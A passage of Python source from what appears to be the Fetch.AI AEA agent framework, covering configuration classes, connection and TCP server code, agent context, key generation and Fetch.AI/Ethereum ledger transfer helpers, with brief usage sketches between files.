self.restricted_to_protocols = restricted_to_protocols if restricted_to_protocols is not None else set()
self.dependencies = dependencies if dependencies is not None else []
self.description = description
self.config = config
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"class_name": self.class_name,
"restricted_to_protocols": self.restricted_to_protocols,
"dependencies": self.dependencies,
"description": self.description,
"config": self.config
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
restricted_to_protocols = obj.get("restricted_to_protocols")
restricted_to_protocols = restricted_to_protocols if restricted_to_protocols is not None else set()
dependencies = cast(List[str], obj.get("dependencies", []))
return ConnectionConfig(
name=cast(str, obj.get("name")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
class_name=cast(str, obj.get("class_name")),
restricted_to_protocols=cast(Set[str], restricted_to_protocols),
dependencies=dependencies,
description=cast(str, obj.get("description")),
**cast(dict, obj.get("config"))
)
class ProtocolConfig(Configuration):
"""Handle protocol configuration."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
dependencies: Optional[List[str]] = None,
description: str = ""):
"""Initialize a connection configuration object."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.dependencies = dependencies
self.description = description
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"dependencies": self.dependencies,
"description": self.description
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
dependencies = cast(List[str], obj.get("dependencies", []))
return ProtocolConfig(
name=cast(str, obj.get("name")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
dependencies=dependencies,
description=cast(str, obj.get("description")),
)
class HandlerConfig(Configuration):
"""Handle a skill handler configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a handler configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return HandlerConfig(
class_name=class_name,
**obj.get("args", {})
)
class BehaviourConfig(Configuration):
"""Handle a skill behaviour configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a behaviour configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return BehaviourConfig(
class_name=class_name,
**obj.get("args", {})
)
class TaskConfig(Configuration):
"""Handle a skill task configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a task configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return TaskConfig(
class_name=class_name,
**obj.get("args", {})
)
class SharedClassConfig(Configuration):
"""Handle a skill shared class configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a shared class configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return SharedClassConfig(
class_name=class_name,
**obj.get("args", {})
)
class SkillConfig(Configuration):
"""Class to represent a skill configuration file."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
protocols: List[str] = None,
dependencies: Optional[List[str]] = None,
description: str = ""):
"""Initialize a skill configuration."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.protocols = protocols if protocols is not None else [] # type: List[str]
self.dependencies = dependencies
self.description = description
self.handlers = CRUDCollection[HandlerConfig]()
self.behaviours = CRUDCollection[BehaviourConfig]()
self.tasks = CRUDCollection[TaskConfig]()
self.shared_classes = CRUDCollection[SharedClassConfig]()
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"protocols": self.protocols,
"dependencies": self.dependencies,
"handlers": [{"handler": h.json} for _, h in self.handlers.read_all()],
"behaviours": [{"behaviour": b.json} for _, b in self.behaviours.read_all()],
"tasks": [{"task": t.json} for _, t in self.tasks.read_all()],
"shared_classes": [{"shared_class": s.json} for _, s in self.shared_classes.read_all()],
"description": self.description
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
name = cast(str, obj.get("name"))
authors = cast(str, obj.get("authors"))
version = cast(str, obj.get("version"))
license = cast(str, obj.get("license"))
url = cast(str, obj.get("url"))
protocols = cast(List[str], obj.get("protocols", []))
dependencies = cast(List[str], obj.get("dependencies", []))
description = cast(str, obj.get("description"))
skill_config = SkillConfig(
name=name,
authors=authors,
version=version,
license=license,
url=url,
protocols=protocols,
dependencies=dependencies,
description=description
)
for b in obj.get("behaviours", []): # type: ignore
behaviour_config = BehaviourConfig.from_json(b["behaviour"])
skill_config.behaviours.create(behaviour_config.class_name, behaviour_config)
for t in obj.get("tasks", []): # type: ignore
task_config = TaskConfig.from_json(t["task"])
skill_config.tasks.create(task_config.class_name, task_config)
for h in obj.get("handlers", []): # type: ignore
handler_config = HandlerConfig.from_json(h["handler"])
skill_config.handlers.create(handler_config.class_name, handler_config)
for s in obj.get("shared_classes", []): # type: ignore
shared_class_config = SharedClassConfig.from_json(s["shared_class"])
skill_config.shared_classes.create(shared_class_config.class_name, shared_class_config)
return skill_config
class AgentConfig(Configuration):
"""Class to represent the agent configuration file."""
def __init__(self,
agent_name: str = "",
aea_version: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
registry_path: str = "",
description: str = "",
private_key_paths: Dict[str, str] = None,
ledger_apis: Dict[str, Tuple[str, int]] = None,
logging_config: Optional[Dict] = None):
"""Instantiate the agent configuration object."""
self.agent_name = agent_name
self.aea_version = aea_version
self.authors = authors
self.version = version
self.license = license
self.url = url
self.registry_path = registry_path
self.description = description
self.private_key_paths = CRUDCollection[PrivateKeyPathConfig]()
self.ledger_apis = CRUDCollection[LedgerAPIConfig]()
private_key_paths = private_key_paths if private_key_paths is not None else {}
for ledger, path in private_key_paths.items():
self.private_key_paths.create(ledger, PrivateKeyPathConfig(ledger, path))
ledger_apis = ledger_apis if ledger_apis is not None else {}
for ledger, (addr, port) in ledger_apis.items():
self.ledger_apis.create(ledger, LedgerAPIConfig(ledger, addr, port))
self.logging_config = logging_config if logging_config is not None else {}
self._default_connection = None # type: Optional[str]
self.connections = set() # type: Set[str]
self.protocols = set() # type: Set[str]
self.skills = set() # type: Set[str]
if self.logging_config == {}:
self.logging_config["version"] = 1
self.logging_config["disable_existing_loggers"] = False
@property
def default_connection(self) -> str:
"""Get the default connection."""
assert self._default_connection is not None, "Default connection not set yet."
return self._default_connection
@default_connection.setter
def default_connection(self, connection_name: str):
"""
Set the default connection.
:param connection_name: the name of the default connection.
:return: None
"""
self._default_connection = connection_name
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"agent_name": self.agent_name,
"aea_version": self.aea_version,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"registry_path": self.registry_path,
"description": self.description,
"private_key_paths": [{"private_key_path": p.json} for l, p in self.private_key_paths.read_all()],
"ledger_apis": [{"ledger_api": t.json} for l, t in self.ledger_apis.read_all()],
"logging_config": self.logging_config,
"default_connection": self.default_connection,
"connections": sorted(self.connections),
"protocols": sorted(self.protocols),
"skills": sorted(self.skills)
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
private_key_paths = {}
for p in obj.get("private_key_paths", []): # type: ignore
private_key_path = PrivateKeyPathConfig.from_json(p["private_key_path"])
private_key_paths[private_key_path.ledger] = private_key_path.path
ledger_apis = {}
for l in obj.get("ledger_apis", []): # type: ignore
ledger_api = LedgerAPIConfig.from_json(l["ledger_api"])
ledger_apis[ledger_api.ledger] = (ledger_api.addr, ledger_api.port)
agent_config = AgentConfig(
agent_name=cast(str, obj.get("agent_name")),
aea_version=cast(str, obj.get("aea_version")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
registry_path=cast(str, obj.get("registry_path")),
description=cast(str, obj.get("description")),
logging_config=cast(Dict, obj.get("logging_config", {})),
private_key_paths=cast(Dict, private_key_paths),
ledger_apis=cast(Dict, ledger_apis)
)
agent_config.connections = set(cast(List[str], obj.get("connections")))
agent_config.protocols = set(cast(List[str], obj.get("protocols")))
agent_config.skills = set(cast(List[str], obj.get("skills")))
# set default configuration
default_connection_name = obj.get("default_connection", None)
agent_config.default_connection = default_connection_name
return agent_config
```
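A small usage sketch of the configuration primitives above: a `CRUDCollection` of `HandlerConfig` objects (keyed by class name, as `SkillConfig` does) and a `ProtocolConfig` JSON round-trip. All field values are made up.

```python
from aea.configurations.base import CRUDCollection, HandlerConfig, ProtocolConfig

handlers = CRUDCollection[HandlerConfig]()
handlers.create("MyHandler", HandlerConfig(class_name="MyHandler", tick_interval=1.0))
assert handlers.read("MyHandler").args == {"tick_interval": 1.0}
assert handlers.read("missing") is None  # unknown ids simply return None

config = ProtocolConfig(name="default", authors="fetchai", version="0.1.0", license="Apache-2.0")
restored = ProtocolConfig.from_json(config.json)
assert restored.name == config.name and restored.version == config.version
```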
#### File: aea/connections/base.py
```python
import logging
from abc import abstractmethod, ABC
from asyncio import AbstractEventLoop
from typing import TYPE_CHECKING, Optional, Set
from aea.configurations.base import ConnectionConfig
if TYPE_CHECKING:
from aea.mail.base import Envelope # pragma: no cover
logger = logging.getLogger(__name__)
class ConnectionStatus(object):
"""The connection status class."""
def __init__(self):
"""Initialize the connection status."""
self.is_connected = False
class Connection(ABC):
"""Abstract definition of a connection."""
def __init__(self, connection_id: str, restricted_to_protocols: Optional[Set[str]] = None):
"""
Initialize the connection.
:param connection_id: the connection identifier.
        :param restricted_to_protocols: the ids of the only protocols supported by this connection.
"""
self._connection_id = connection_id
self._restricted_to_protocols = self._get_restricted_to_protocols(restricted_to_protocols)
self._loop = None # type: Optional[AbstractEventLoop]
self._connection_status = ConnectionStatus()
def _get_restricted_to_protocols(self, restricted_to_protocols: Optional[Set[str]] = None) -> Set[str]:
if restricted_to_protocols is not None:
return restricted_to_protocols
elif hasattr(type(self), "restricted_to_protocols") and isinstance(getattr(type(self), "restricted_to_protocols"), set):
return getattr(type(self), "restricted_to_protocols")
else:
return set()
@property
def loop(self) -> Optional[AbstractEventLoop]:
"""Get the event loop."""
return self._loop
@loop.setter
def loop(self, loop: AbstractEventLoop) -> None:
"""
Set the event loop.
:param loop: the event loop.
:return: None
"""
assert self._loop is None or not self._loop.is_running(), "Cannot set the loop while it is running."
self._loop = loop
@property
def connection_id(self) -> str:
"""Get the id of the connection."""
return self._connection_id
@property
def restricted_to_protocols(self) -> Set[str]:
"""Get the restricted to protocols.."""
return self._restricted_to_protocols
@property
def connection_status(self) -> ConnectionStatus:
"""Get the connection status."""
return self._connection_status
@abstractmethod
async def connect(self):
"""Set up the connection."""
@abstractmethod
async def disconnect(self):
"""Tear down the connection."""
@abstractmethod
async def send(self, envelope: 'Envelope') -> None:
"""
Send an envelope.
:param envelope: the envelope to send.
:return: None
"""
@abstractmethod
async def receive(self, *args, **kwargs) -> Optional['Envelope']:
"""
Receive an envelope.
:return: the received envelope, or None if an error occurred.
"""
@classmethod
@abstractmethod
def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':
"""
Initialize a connection instance from a configuration.
:param public_key: the public key of the agent.
:param connection_configuration: the connection configuration.
:return: an instance of the concrete connection class.
"""
```
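To make the abstract interface above concrete, here is a purely illustrative subclass (not part of the package) that satisfies every abstract method with an in-memory queue; the class name and its behaviour are assumptions made for the sketch only.

```python
import asyncio
from typing import Optional

from aea.configurations.base import ConnectionConfig
from aea.connections.base import Connection
from aea.mail.base import Envelope


class LocalEchoConnection(Connection):
    """Toy connection: every envelope that is sent can be received back."""

    def __init__(self, connection_id: str = "local_echo", **kwargs):
        super().__init__(connection_id, **kwargs)
        self._queue = asyncio.Queue()  # type: asyncio.Queue

    async def connect(self):
        self.connection_status.is_connected = True

    async def disconnect(self):
        self.connection_status.is_connected = False

    async def send(self, envelope: 'Envelope') -> None:
        await self._queue.put(envelope)

    async def receive(self, *args, **kwargs) -> Optional['Envelope']:
        return await self._queue.get()

    @classmethod
    def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':
        return cls(connection_id=connection_configuration.name,
                   restricted_to_protocols=set(connection_configuration.restricted_to_protocols))
```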
#### File: connections/tcp/tcp_server.py
```python
import asyncio
import logging
from asyncio import StreamReader, StreamWriter, AbstractServer, Future
from typing import Dict, Optional, Tuple, cast
from aea.configurations.base import ConnectionConfig
from aea.connections.base import Connection
from aea.connections.tcp.base import TCPConnection
from aea.mail.base import Envelope
logger = logging.getLogger(__name__)
STUB_DIALOGUE_ID = 0
class TCPServerConnection(TCPConnection):
"""This class implements a TCP server."""
def __init__(self,
public_key: str,
host: str,
port: int,
connection_id: str = "tcp_server",
**kwargs):
"""
        Initialize a TCP server connection.
        :param public_key: the public key of the agent.
        :param host: the socket bind address.
        :param port: the socket bind port.
"""
super().__init__(public_key, host, port, connection_id, **kwargs)
self._server = None # type: Optional[AbstractServer]
self.connections = {} # type: Dict[str, Tuple[StreamReader, StreamWriter]]
self._read_tasks_to_public_key = dict() # type: Dict[Future, str]
async def handle(self, reader: StreamReader, writer: StreamWriter) -> None:
"""
Handle new connections.
:param reader: the stream reader.
:param writer: the stream writer.
:return: None
"""
logger.debug("Waiting for client public key...")
public_key_bytes = await self._recv(reader)
if public_key_bytes:
public_key_bytes = cast(bytes, public_key_bytes)
public_key = public_key_bytes.decode("utf-8")
logger.debug("Public key of the client: {}".format(public_key))
self.connections[public_key] = (reader, writer)
read_task = asyncio.ensure_future(self._recv(reader), loop=self._loop)
self._read_tasks_to_public_key[read_task] = public_key
async def receive(self, *args, **kwargs) -> Optional['Envelope']:
"""
Receive an envelope.
:return: the received envelope, or None if an error occurred.
"""
if len(self._read_tasks_to_public_key) == 0:
logger.warning("Tried to read from the TCP server. However, there is no open connection to read from.")
return None
try:
logger.debug("Waiting for incoming messages...")
done, pending = await asyncio.wait(self._read_tasks_to_public_key.keys(), return_when=asyncio.FIRST_COMPLETED) # type: ignore
# take the first
task = next(iter(done))
envelope_bytes = task.result()
if envelope_bytes is None: # pragma: no cover
logger.debug("[{}]: No data received.")
return None
envelope = Envelope.decode(envelope_bytes)
public_key = self._read_tasks_to_public_key.pop(task)
reader = self.connections[public_key][0]
new_task = asyncio.ensure_future(self._recv(reader), loop=self._loop)
self._read_tasks_to_public_key[new_task] = public_key
return envelope
except asyncio.CancelledError:
logger.debug("Receiving loop cancelled.")
return None
except Exception as e:
logger.error("Error in the receiving loop: {}".format(str(e)))
return None
async def setup(self):
"""Set the connection up."""
self._server = await asyncio.start_server(self.handle, host=self.host, port=self.port)
logger.debug("Start listening on {}:{}".format(self.host, self.port))
async def teardown(self):
"""Tear the connection down."""
for pbk, (reader, _) in self.connections.items():
reader.feed_eof()
for t in self._read_tasks_to_public_key:
t.cancel()
self._server.close()
def select_writer_from_envelope(self, envelope: Envelope):
"""Select the destination, given the envelope."""
to = envelope.to
if to not in self.connections:
return None
_, writer = self.connections[to]
return writer
@classmethod
def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':
"""Get the TCP server connection from the connection configuration.
:param public_key: the public key of the agent.
:param connection_configuration: the connection configuration object.
:return: the connection object
"""
address = cast(str, connection_configuration.config.get("address"))
port = cast(int, connection_configuration.config.get("port"))
return TCPServerConnection(public_key, address, port,
connection_id=connection_configuration.name,
restricted_to_protocols=set(connection_configuration.restricted_to_protocols))
```
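A short sketch of building and starting the server above from a `ConnectionConfig`; the public key string and the address/port values are placeholders, and the `aea` package with its TCP connection module is assumed to be installed.

```python
import asyncio

from aea.configurations.base import ConnectionConfig
from aea.connections.tcp.tcp_server import TCPServerConnection

configuration = ConnectionConfig(name="tcp_server", address="127.0.0.1", port=8082)
server = TCPServerConnection.from_config("my_public_key", configuration)

loop = asyncio.get_event_loop()
loop.run_until_complete(server.setup())     # starts listening on 127.0.0.1:8082
loop.run_until_complete(server.teardown())  # closes the server and any client read tasks
```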
#### File: aea/context/base.py
```python
from queue import Queue
from typing import Dict
from aea.connections.base import ConnectionStatus
from aea.decision_maker.base import OwnershipState, Preferences, GoalPursuitReadiness
from aea.mail.base import OutBox
from aea.crypto.default import DEFAULT
from aea.crypto.fetchai import FETCHAI
from aea.crypto.ledger_apis import LedgerApis
class AgentContext:
"""Provide read access to relevant data of the agent for the skills."""
def __init__(self, agent_name: str,
public_keys: Dict[str, str],
addresses: Dict[str, str],
ledger_apis: LedgerApis,
connection_status: ConnectionStatus,
outbox: OutBox,
decision_maker_message_queue: Queue,
ownership_state: OwnershipState,
preferences: Preferences,
goal_pursuit_readiness: GoalPursuitReadiness):
"""
Initialize an agent context.
:param agent_name: the agent's name
        :param public_keys: the public keys of the agent
        :param addresses: the addresses of the agent
        :param ledger_apis: the ledger apis
:param connection_status: the connection status
:param outbox: the outbox
:param decision_maker_message_queue: the (in) queue of the decision maker
:param ownership_state: the ownership state of the agent
:param preferences: the preferences of the agent
        :param goal_pursuit_readiness: whether the agent is ready to pursue its goals
"""
self._agent_name = agent_name
self._public_keys = public_keys
self._addresses = addresses
self._ledger_apis = ledger_apis
self._connection_status = connection_status
self._outbox = outbox
self._decision_maker_message_queue = decision_maker_message_queue
self._ownership_state = ownership_state
self._preferences = preferences
self._goal_pursuit_readiness = goal_pursuit_readiness
@property
def agent_name(self) -> str:
"""Get agent name."""
return self._agent_name
@property
def public_keys(self) -> Dict[str, str]:
"""Get public keys."""
return self._public_keys
@property
def addresses(self) -> Dict[str, str]:
"""Get addresses."""
return self._addresses
@property
def address(self) -> str:
"""Get the defualt address."""
return self._addresses[FETCHAI] if FETCHAI in self._addresses.keys() else self._addresses[DEFAULT]
@property
def public_key(self) -> str:
"""Get the default public key."""
return self._public_keys[FETCHAI] if FETCHAI in self._public_keys.keys() else self._public_keys[DEFAULT]
@property
def connection_status(self) -> ConnectionStatus:
"""Get connection status."""
return self._connection_status
@property
def outbox(self) -> OutBox:
"""Get outbox."""
return self._outbox
@property
def decision_maker_message_queue(self) -> Queue:
"""Get decision maker queue."""
return self._decision_maker_message_queue
@property
def ownership_state(self) -> OwnershipState:
"""Get the ownership state of the agent."""
return self._ownership_state
@property
def preferences(self) -> Preferences:
"""Get the preferences of the agent."""
return self._preferences
@property
def goal_pursuit_readiness(self) -> GoalPursuitReadiness:
"""Get the goal pursuit readiness."""
return self._goal_pursuit_readiness
@property
def ledger_apis(self) -> LedgerApis:
"""Get the ledger APIs."""
return self._ledger_apis
```
#### File: aea/crypto/fetchai.py
```python
import logging
from pathlib import Path
from typing import Optional, BinaryIO
from fetchai.ledger.crypto import Entity, Identity, Address # type: ignore
from aea.crypto.base import Crypto
logger = logging.getLogger(__name__)
FETCHAI = "fetchai"
class FetchAICrypto(Crypto):
"""Class wrapping the Entity Generation from Fetch.AI ledger."""
identifier = FETCHAI
def __init__(self, private_key_path: Optional[str] = None):
"""
Instantiate a fetchai crypto object.
:param private_key_path: the private key path of the agent
"""
self._entity = self._generate_private_key() if private_key_path is None else self._load_private_key_from_path(private_key_path)
self._address = str(Address(Identity.from_hex(self.public_key)))
@property
def entity(self) -> Entity:
"""Get the entity."""
return self._entity
@property
def public_key(self) -> str:
"""
Return a public key in hex format.
:return: a public key string in hex format
"""
return self._entity.public_key_hex
@property
def address(self) -> str:
"""
Return the address for the key pair.
:return: a display_address str
"""
return self._address
def _load_private_key_from_path(self, file_name) -> Entity:
"""
Load a private key in hex format from a file.
:param file_name: the path to the hex file.
:return: the Entity.
"""
path = Path(file_name)
try:
if path.is_file():
with open(path, "r") as key:
data = key.read()
entity = Entity.from_hex(data)
else:
entity = self._generate_private_key()
return entity
except IOError as e: # pragma: no cover
logger.exception(str(e))
    def _generate_private_key(self) -> Entity:
        """Generate a new entity, i.e. a fresh private key."""
        entity = Entity()
        return entity
def sign_transaction(self, message: bytes) -> bytes:
"""
        Sign a transaction to send it to the ledger.
        :param message: the message to sign.
        :return: the signed message in bytes.
"""
signature = self._entity.sign(message)
return signature
@classmethod
def get_address_from_public_key(cls, public_key: str) -> Address:
"""
Get the address from the public key.
:param public_key: the public key
:return: str
"""
identity = Identity.from_hex(public_key)
return Address(identity)
@classmethod
def load(cls, fp: BinaryIO):
"""
Deserialize binary file `fp` (a `.read()`-supporting file-like object containing a private key).
:param fp: the input file pointer. Must be set in binary mode (mode='rb')
:return: None
"""
raise NotImplementedError # pragma: no cover
def dump(self, fp: BinaryIO) -> None:
"""
Serialize crypto object as binary stream to `fp` (a `.write()`-supporting file-like object).
:param fp: the output file pointer. Must be set in binary mode (mode='wb')
:return: None
"""
fp.write(self.entity.private_key_hex.encode("utf-8"))
```
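A brief sketch (assuming the `fetchai-ledger-api` dependency is installed) of generating a fresh key pair with the wrapper above and persisting it, much as `aea generate-key fetchai` does; the file name is illustrative.

```python
from aea.crypto.fetchai import FetchAICrypto

crypto = FetchAICrypto()  # no path given -> a new Entity (private key) is generated
print("public key:", crypto.public_key)
print("address:", crypto.address)

# dump the private key in hex so it can be reloaded later via private_key_path
with open("fet_private_key.txt", "wb") as fp:
    crypto.dump(fp)

restored = FetchAICrypto(private_key_path="fet_private_key.txt")
assert restored.public_key == crypto.public_key
```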
#### File: aea/crypto/ledger_apis.py
```python
import logging
import sys
import time
from typing import Any, Dict, Optional, Tuple, cast
import web3
import web3.exceptions
from fetchai.ledger.api import LedgerApi as FetchLedgerApi
# from fetchai.ledger.api.tx import TxStatus
from web3 import Web3, HTTPProvider
from aea.crypto.base import Crypto
from aea.crypto.ethereum import ETHEREUM
from aea.crypto.fetchai import FETCHAI
DEFAULT_FETCHAI_CONFIG = ('alpha.fetch-ai.com', 80)
SUCCESSFUL_TERMINAL_STATES = ('Executed', 'Submitted')
SUPPORTED_LEDGER_APIS = [ETHEREUM, FETCHAI]
logger = logging.getLogger(__name__)
GAS_PRICE = '50'
GAS_ID = 'gwei'
UNKNOWN = "UNKNOWN"
OK = "OK"
ERROR = "ERROR"
class LedgerApis(object):
"""Store all the ledger apis we initialise."""
def __init__(self, ledger_api_configs: Dict[str, Tuple[str, int]]):
"""
Instantiate a wallet object.
:param ledger_api_configs: the ledger api configs
"""
apis = {} # type: Dict[str, Any]
configs = {} # type: Dict[str, Tuple[str, int]]
self._last_tx_statuses = {} # type: Dict[str, str]
for identifier, config in ledger_api_configs.items():
self._last_tx_statuses[identifier] = UNKNOWN
if identifier == FETCHAI:
api = FetchLedgerApi(config[0], config[1])
apis[identifier] = api
configs[identifier] = config
elif identifier == ETHEREUM:
api = Web3(HTTPProvider(config[0]))
apis[identifier] = api
configs[identifier] = config
else:
raise ValueError("Unsupported identifier in ledger apis.")
self._apis = apis
self._configs = configs
@property
def configs(self) -> Dict[str, Tuple[str, int]]:
"""Get the configs."""
return self._configs
@property
def apis(self) -> Dict[str, Any]:
"""Get the apis."""
return self._apis
@property
def has_fetchai(self) -> bool:
"""Check if it has the fetchai API."""
return FETCHAI in self.apis.keys()
@property
def has_ethereum(self) -> bool:
"""Check if it has the ethereum API."""
return ETHEREUM in self.apis.keys()
@property
def last_tx_statuses(self) -> Dict[str, str]:
"""Get the statuses for the last transaction."""
return self._last_tx_statuses
def token_balance(self, identifier: str, address: str) -> int:
"""
Get the token balance.
:param identifier: the identifier of the ledger
:param address: the address to check for
:return: the token balance
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
api = self.apis[identifier]
if identifier == FETCHAI:
try:
balance = api.tokens.balance(address)
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to get the current balance.")
balance = 0
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
balance = api.eth.getBalance(address)
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to get the current balance.")
balance = 0
self._last_tx_statuses[identifier] = ERROR
else: # pragma: no cover
raise Exception("Ledger id is not known")
return balance
def transfer(self, identifier: str, crypto_object: Crypto, destination_address: str, amount: int, tx_fee: int) -> Optional[str]:
"""
Transfer from self to destination.
:param identifier: the crypto code
        :param crypto_object: the crypto object that contains the functions for signing transactions.
        :param destination_address: the address of the receiver.
:param amount: the amount
:param tx_fee: the tx fee
:return: tx digest if successful, otherwise None
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
api = self.apis[identifier]
logger.info("Waiting for the validation of the transaction ...")
if identifier == FETCHAI:
try:
tx_digest = api.tokens.transfer(crypto_object.entity, destination_address, amount, tx_fee)
api.sync(tx_digest)
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting the transfer.")
tx_digest = None
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
nonce = api.eth.getTransactionCount(api.toChecksumAddress(crypto_object.address))
# TODO : handle misconfiguration
chain_id = self.configs.get(identifier)[1] # type: ignore
transaction = {
'nonce': nonce,
'chainId': chain_id,
'to': destination_address,
'value': amount,
'gas': tx_fee,
'gasPrice': api.toWei(GAS_PRICE, GAS_ID)
}
signed = api.eth.account.signTransaction(transaction, crypto_object.entity.privateKey)
hex_value = api.eth.sendRawTransaction(signed.rawTransaction)
logger.info("TX Hash: {}".format(str(hex_value.hex())))
while True:
try:
api.eth.getTransactionReceipt(hex_value)
logger.info("transaction validated - exiting")
tx_digest = hex_value.hex()
self._last_tx_statuses[identifier] = OK
break
except web3.exceptions.TransactionNotFound: # pragma: no cover
logger.info("transaction not found - sleeping for 3.0 seconds")
self._last_tx_statuses[identifier] = ERROR
time.sleep(3.0)
return tx_digest
except Exception:
logger.warning("An error occurred while attempting the transfer.")
tx_digest = None
self._last_tx_statuses[identifier] = ERROR
else: # pragma: no cover
raise Exception("Ledger id is not known")
return tx_digest
def is_tx_settled(self, identifier: str, tx_digest: str, amount: int) -> bool:
"""
Check whether the transaction is settled and correct.
:param identifier: the identifier of the ledger
:param tx_digest: the transaction digest
:return: True if correctly settled, False otherwise
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
is_successful = False
api = self.apis[identifier]
if identifier == FETCHAI:
try:
logger.info("Checking the transaction ...")
# tx_status = cast(TxStatus, api.tx.status(tx_digest))
tx_status = cast(str, api.tx.status(tx_digest))
# if tx_status.successful:
if tx_status in SUCCESSFUL_TERMINAL_STATES:
# tx_contents = cast(TxContents, api.tx.contents(tx_digest))
# tx_contents.transfers_to()
# TODO: check the amount of the transaction is correct
is_successful = True
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to check the transaction.")
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
logger.info("Checking the transaction ...")
tx_status = api.eth.getTransactionReceipt(tx_digest)
if tx_status is not None:
is_successful = True
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occured while attempting to check the transaction!")
self._last_tx_statuses[identifier] = ERROR
return is_successful
def _try_to_instantiate_fetchai_ledger_api(addr: str, port: int) -> None:
"""
    Try to instantiate the fetchai ledger API.
:param addr: the address
:param port: the port
"""
try:
from fetchai.ledger.api import LedgerApi
LedgerApi(addr, port)
except Exception:
logger.error("Cannot connect to fetchai ledger with provided config.")
sys.exit(1)
def _try_to_instantiate_ethereum_ledger_api(addr: str, port: int) -> None:
"""
    Try to instantiate the ethereum ledger API.
:param addr: the address
:param port: the port
"""
try:
from web3 import Web3, HTTPProvider
Web3(HTTPProvider(addr))
except Exception:
logger.error("Cannot connect to ethereum ledger with provided config.")
sys.exit(1)
```
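A hedged sketch of wiring up `LedgerApis` for the fetch.ai test network via the `DEFAULT_FETCHAI_CONFIG` constant above; it needs network access, and the queried address is a placeholder (an unknown address simply yields a zero balance and an ERROR status).

```python
from aea.crypto.fetchai import FETCHAI
from aea.crypto.ledger_apis import DEFAULT_FETCHAI_CONFIG, LedgerApis

ledger_apis = LedgerApis({FETCHAI: DEFAULT_FETCHAI_CONFIG})
assert ledger_apis.has_fetchai and not ledger_apis.has_ethereum

balance = ledger_apis.token_balance(FETCHAI, "some_fetchai_address")  # placeholder address
print(balance, ledger_apis.last_tx_statuses[FETCHAI])
```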
#### File: helpers/preference_representations/base.py
```python
import math
from typing import Dict
def logarithmic_utility(utility_params_by_good_pbk: Dict[str, float], quantities_by_good_pbk: Dict[str, int], quantity_shift: int = 1) -> float:
"""
Compute agent's utility given her utility function params and a good bundle.
:param utility_params_by_good_pbk: utility params by good identifier
:param quantities_by_good_pbk: quantities by good identifier
:param quantity_shift: a non-negative factor to shift the quantities in the utility function (to ensure the natural logarithm can be used on the entire range of quantities)
:return: utility value
"""
assert quantity_shift >= 0, "The quantity_shift argument must be a non-negative integer."
goodwise_utility = [utility_params_by_good_pbk[good_pbk] * math.log(quantity + quantity_shift) if quantity + quantity_shift > 0 else -10000
for good_pbk, quantity in quantities_by_good_pbk.items()]
return sum(goodwise_utility)
def linear_utility(exchange_params_by_currency: Dict[str, float], balance_by_currency: Dict[str, int]) -> float:
"""
Compute agent's utility given her utility function params and a good bundle.
